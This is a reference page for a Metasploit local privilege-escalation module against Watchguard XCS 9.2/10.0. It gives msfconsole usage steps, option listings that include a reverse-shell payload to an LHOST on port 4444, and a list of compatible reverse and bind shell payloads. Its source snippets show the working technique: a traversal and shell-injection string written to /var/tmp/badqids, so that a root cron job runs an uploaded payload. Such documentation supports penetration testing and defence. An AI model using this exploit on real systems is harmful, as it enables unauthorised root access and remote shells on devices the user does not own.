Watchguard XCS FixCorruptMail Local Privilege Escalation - Metasploit
This page contains detailed information about how to use the exploit/freebsd/local/watchguard_fix_corrupt_mail metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Watchguard XCS FixCorruptMail Local Privilege Escalation
Module: exploit/freebsd/local/watchguard_fix_corrupt_mail
Source code: modules/exploits/freebsd/local/watchguard_fix_corrupt_mail.rb
Disclosure date: 2015-06-29
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): x64
Supported platform(s): BSD
Target service / protocol: -
Target network port(s): -
List of CVEs: -
This module exploits a vulnerability in the Watchguard XCS 'FixCorruptMail' script called by root's crontab which can be exploited to run a command as root within 3 minutes.
Module Ranking and Traits
Module Ranking:
- manual: The exploit is unstable or difficult to exploit and is basically a DoS. This ranking is also used when the module has no use unless specifically configured by the user (e.g.: exploit/windows/smb/psexec). More information about ranking can be found here.
Basic Usage
Note: To run a local exploit, make sure you are at the msf prompt.
Also, to check the session ID, use the sessions
command.
msf > use exploit/freebsd/local/watchguard_fix_corrupt_mail
msf exploit(watchguard_fix_corrupt_mail) > show targets
... a list of targets ...
msf exploit(watchguard_fix_corrupt_mail) > set TARGET target-id
msf exploit(watchguard_fix_corrupt_mail) > show options
... show and set options ...
msf exploit(watchguard_fix_corrupt_mail) > set SESSION session-id
msf exploit(watchguard_fix_corrupt_mail) > exploit
Required Options
- SESSION: The session to run this module on.
Go back to menu.
Msfconsole Usage
Here is how the freebsd/local/watchguard_fix_corrupt_mail exploit module looks in the msfconsole:
msf6 > use exploit/freebsd/local/watchguard_fix_corrupt_mail
[*] No payload configured, defaulting to generic/shell_reverse_tcp
msf6 exploit(freebsd/local/watchguard_fix_corrupt_mail) > show info
Name: Watchguard XCS FixCorruptMail Local Privilege Escalation
Module: exploit/freebsd/local/watchguard_fix_corrupt_mail
Platform: BSD
Arch: x64
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Manual
Disclosed: 2015-06-29
Provided by:
Daniel Jensen <[email protected]>
Available targets:
Id Name
-- ----
0 Watchguard XCS 9.2/10.0
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Payload information:
Description:
This module exploits a vulnerability in the Watchguard XCS
'FixCorruptMail' script called by root's crontab which can be
exploited to run a command as root within 3 minutes.
References:
http://security-assessment.com/files/documents/advisory/Watchguard-XCS-final.pdf
Module Options
This is a complete list of options available in the freebsd/local/watchguard_fix_corrupt_mail exploit:
msf6 exploit(freebsd/local/watchguard_fix_corrupt_mail) > show options
Module options (exploit/freebsd/local/watchguard_fix_corrupt_mail):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Payload options (generic/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.204.3 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Watchguard XCS 9.2/10.0
Advanced Options
Here is a complete list of advanced options supported by the freebsd/local/watchguard_fix_corrupt_mail exploit:
msf6 exploit(freebsd/local/watchguard_fix_corrupt_mail) > show advanced
Module advanced options (exploit/freebsd/local/watchguard_fix_corrupt_mail):
Name Current Setting Required Description
---- --------------- -------- -----------
ContextInformationFile no The information file that contains context information
DisablePayloadHandler false no Disable the handler code for the selected payload
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableContextEncoding false no Use transient context when encoding payloads
FileDropperDelay no Delay in seconds before attempting cleanup
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
WfsDelay 180 no Additional delay in seconds to wait for a session
Payload advanced options (generic/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
ARCH no The architecture that is being targeted
PLATFORM no The platform that is being targeted
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Exploit Targets
Here is a list of targets (platforms and systems) which the freebsd/local/watchguard_fix_corrupt_mail module can exploit:
msf6 exploit(freebsd/local/watchguard_fix_corrupt_mail) > show targets
Exploit targets:
Id Name
-- ----
0 Watchguard XCS 9.2/10.0
Compatible Payloads
This is a list of possible payloads which can be delivered and executed on the target system using the freebsd/local/watchguard_fix_corrupt_mail exploit:
msf6 exploit(freebsd/local/watchguard_fix_corrupt_mail) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/bsd/x64/exec normal No BSD x64 Execute Command
1 payload/bsd/x64/shell_bind_ipv6_tcp normal No BSD x64 Command Shell, Bind TCP Inline (IPv6)
2 payload/bsd/x64/shell_bind_tcp normal No BSD x64 Shell Bind TCP
3 payload/bsd/x64/shell_bind_tcp_small normal No BSD x64 Command Shell, Bind TCP Inline
4 payload/bsd/x64/shell_reverse_ipv6_tcp normal No BSD x64 Command Shell, Reverse TCP Inline (IPv6)
5 payload/bsd/x64/shell_reverse_tcp normal No BSD x64 Shell Reverse TCP
6 payload/bsd/x64/shell_reverse_tcp_small normal No BSD x64 Command Shell, Reverse TCP Inline
7 payload/generic/custom normal No Custom Payload
8 payload/generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
9 payload/generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
Evasion Options
Here is the full list of possible evasion options supported by the freebsd/local/watchguard_fix_corrupt_mail exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 exploit(freebsd/local/watchguard_fix_corrupt_mail) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Error Messages
This module may fail with the following error messages:
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
[email protected]
Here is a relevant code snippet related to the "[email protected]" error message:
50: end
51:
52: def check
53: #Basic check to see if the device is a Watchguard XCS
54: res = cmd_exec('uname -a')
55: return Exploit::CheckCode::Detected if res && res.include?('[email protected]')
56:
57: Exploit::CheckCode::Safe
58: end
59:
60: def upload_payload
Rooting can take up to 3 minutes.
Here is a relevant code snippet related to the "Rooting can take up to 3 minutes." error message:
66:
67: fname
68: end
69:
70: def exploit
71: print_warning('Rooting can take up to 3 minutes.')
72:
73: #Generate and upload the payload
74: filename = upload_payload
75: fail_with(Failure::NotFound, 'Payload failed to upload') if filename.nil?
76: print_status("Payload #{filename} uploaded.")
Payload failed to upload
Here is a relevant code snippet related to the "Payload failed to upload" error message:
70: def exploit
71: print_warning('Rooting can take up to 3 minutes.')
72:
73: #Generate and upload the payload
74: filename = upload_payload
75: fail_with(Failure::NotFound, 'Payload failed to upload') if filename.nil?
76: print_status("Payload #{filename} uploaded.")
77:
78: #Sets up empty dummy file needed for privesc
79: dummy_filename = "/tmp/#{Rex::Text.rand_text_alpha(5)}"
80: cmd_exec("touch #{dummy_filename}")
Failed to create badqids file to exploit crontab
Here is a relevant code snippet related to the "Failed to create badqids file to exploit crontab" error message:
81: vprint_status('Added dummy file')
82:
83: #Put the shell injection line into badqids
84: #setup_privesc = "echo \"../../../../../..#{dummy_filename};#{filename}\" > /var/tmp/badqids"
85: badqids = write_file('/var/tmp/badqids', "../../../../../..#{dummy_filename};#{filename}")
86: fail_with(Failure::NotFound, 'Failed to create badqids file to exploit crontab') if badqids.nil?
87: print_status('Badqids created, waiting for vulnerable script to be called by crontab...')
88: #cmd_exec(setup_privesc)
89:
90: #Cleanup the files we used
91: register_file_for_cleanup('/var/tmp/badqids')
Go back to menu.
Related Pull Requests
- #14213 Merged Pull Request: Add disclosure date rubocop linting rule - enforce iso8601 disclosure dates
- #8716 Merged Pull Request: Print_Status -> Print_Good (And OCD bits 'n bobs)
- #8338 Merged Pull Request: Fix msf/core and self.class msftidy warnings
- #7507 Merged Pull Request: Refactor arch/platform, refactor TLV XOR, add UUID to each packet, fix payload uuid/arch/platform tracking, and update everything to match
- #6655 Merged Pull Request: use MetasploitModule as a class name
- #6648 Merged Pull Request: Change metasploit class names
- #6331 Merged Pull Request: Fix #6330, generate_payload_exe returning nil for generic bind/reverse payloads
References
See Also
Check also the following modules related to this module:
- exploit/freebsd/http/watchguard_cmd_exec
- exploit/freebsd/local/intel_sysret_priv_esc
- exploit/freebsd/local/ip6_setpktopt_uaf_priv_esc
- exploit/freebsd/local/mmap
- exploit/freebsd/local/rtld_execl_priv_esc
- auxiliary/dos/windows/smb/ms06_035_mailslot
- exploit/linux/http/mailcleaner_exec
- exploit/osx/email/mailapp_image_exec
- exploit/unix/local/netbsd_mail_local
- exploit/unix/smtp/opensmtpd_mail_from_rce
- exploit/windows/browser/communicrypt_mail_activex
- exploit/windows/http/mailenable_auth_header
- exploit/windows/imap/mailenable_login
- exploit/windows/imap/mailenable_status
- exploit/windows/imap/mailenable_w3c_select
- exploit/windows/misc/eureka_mail_err
- exploit/windows/smtp/mailcarrier_smtp_ehlo
- exploit/linux/local/zimbra_postfix_priv_esc
- exploit/linux/misc/gld_postfix
- exploit/windows/ftp/easyftp_cwd_fixret
- exploit/windows/ftp/easyftp_list_fixret
- exploit/windows/ftp/easyftp_mkd_fixret
- exploit/unix/webapp/cakephp_cache_corruption
- exploit/windows/browser/adobe_shockwave_rcsl_corruption
- exploit/windows/browser/ms08_078_xml_corruption
- exploit/windows/browser/ms09_002_memory_corruption
- auxiliary/gather/ibm_bigfix_sites_packages_enum
- auxiliary/fuzzers/smb/smb2_negotiate_corrupt
- auxiliary/fuzzers/smb/smb_create_pipe_corrupt
- auxiliary/fuzzers/smb/smb_negotiate_corrupt
- auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt
- auxiliary/fuzzers/smb/smb_tree_connect_corrupt
- auxiliary/fuzzers/ssh/ssh_kexinit_corrupt
- auxiliary/fuzzers/ssh/ssh_version_corrupt
- auxiliary/fuzzers/tds/tds_login_corrupt
- exploit/bsd/finger/morris_fingerd_bof
- payload/bsd/sparc/shell_bind_tcp
- payload/bsd/sparc/shell_reverse_tcp
- payload/bsd/vax/shell_reverse_tcp
- payload/bsd/x64/exec
- payload/bsd/x64/shell_bind_ipv6_tcp
- payload/bsd/x64/shell_bind_tcp
- payload/bsd/x64/shell_bind_tcp_small
- payload/bsd/x64/shell_reverse_ipv6_tcp
- payload/bsd/x64/shell_reverse_tcp
- payload/bsd/x64/shell_reverse_tcp_small
- payload/bsd/x86/exec
- payload/bsd/x86/metsvc_bind_tcp
- payload/bsd/x86/metsvc_reverse_tcp
- payload/bsd/x86/shell/bind_ipv6_tcp
- payload/bsd/x86/shell/bind_tcp
- payload/bsd/x86/shell_bind_tcp
- payload/bsd/x86/shell_bind_tcp_ipv6
- payload/bsd/x86/shell_find_port
- payload/bsd/x86/shell/find_tag
- payload/bsd/x86/shell_find_tag
- payload/bsd/x86/shell/reverse_ipv6_tcp
- payload/bsd/x86/shell/reverse_tcp
- payload/bsd/x86/shell_reverse_tcp
- payload/bsd/x86/shell_reverse_tcp_ipv6
- post/bsd/gather/hashdump
Authors
- Daniel Jensen <daniel.jensen[at]security-assessment.com>
Version
This page has been produced using Metasploit Framework version 6.2.26-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.